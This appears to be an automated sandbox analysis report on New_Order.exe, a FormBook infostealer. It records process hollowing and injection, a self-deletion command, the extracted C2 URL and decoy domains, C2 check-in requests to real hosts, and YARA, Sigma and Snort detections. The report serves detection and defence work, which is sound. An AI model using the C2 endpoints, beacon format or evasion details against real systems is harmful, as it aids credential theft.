
Analysis Report New_Order.exe

Overview

General Information

Sample Name: New_Order.exe
Analysis ID: 411746
MD5: 74e4eb9afbf8f9c9b285a46ced831979
SHA1: 8d65df9dc971c859f0a86a158d9576f528603410
SHA256: 68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dridex Process Pattern
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • New_Order.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: 74E4EB9AFBF8F9C9B285A46CED831979)
    • svchost.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: FA6C268A5B5BDA067A901764D203D433)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6816 cmdline: /c del 'C:\Windows\SysWOW64\svchost.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.svchost.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
0.2.New_Order.exe.24e0000.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.New_Order.exe.24e0000.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Dridex Process Pattern
Source: Process started; Author: Florian Roth, oscd.community; Data: Command: 'C:\Users\user\Desktop\New_Order.exe', CommandLine: 'C:\Users\user\Desktop\New_Order.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ProcessId: 6252
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\user\Desktop\New_Order.exe', CommandLine: 'C:\Users\user\Desktop\New_Order.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ProcessId: 6252
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: 'C:\Users\user\Desktop\New_Order.exe', CommandLine: 'C:\Users\user\Desktop\New_Order.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ProcessId: 6252

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration identical to the one listed in the Malware Configuration section above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll, ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: New_Order.exe, Virustotal: Detection: 38%
Source: New_Order.exe, ReversingLabs: Detection: 59%
Yara detected FormBook
Source: Yara match, File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: New_Order.exe, Joe Sandbox ML: detected
Source: 0.2.New_Order.exe.24e0000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.svchost.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: New_Order.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: New_Order.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL, source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP, source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP, source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source: Binary string: wscript.pdb, source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb, source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP, source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb, source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\New_Order.exe, Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe, Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop esi, 1_2_0041581A
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 1_2_0040C3EA
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then pop esi, 7_2_0062581A
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then pop edi, 7_2_0061C3EA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.voiceclubdubai.com/icsm/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.year-action.xyz
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1; Host: www.roastedorganic.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1; Host: www.voiceclubdubai.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1; Host: www.geacasolaro.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1; Host: www.charmboutiques.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1; Host: www.websitemax.co.uk; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1; Host: www.year-action.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1; Host: www.hdjakdhf.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1; Host: www.susanestuart.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View, IP Address: 75.2.115.196
Source: Joe Sandbox View, IP Address: 23.227.38.74
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View, ASN Name: TELEPOINTBG
Source: unknown, DNS traffic detected: queries for: www.roastedorganic.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty; Date: Wed, 12 May 2021 04:11:08 GMT; Content-Type: text/html; charset=utf-8; Content-Length: 253; Connection: close; X-Varnish: 824312071; Retry-After: 5; Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: New_Order.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New_Order.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmp, String found in binary or memory: https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk
Source: C:\Users\user\Desktop\New_Order.exe, Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040535C

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
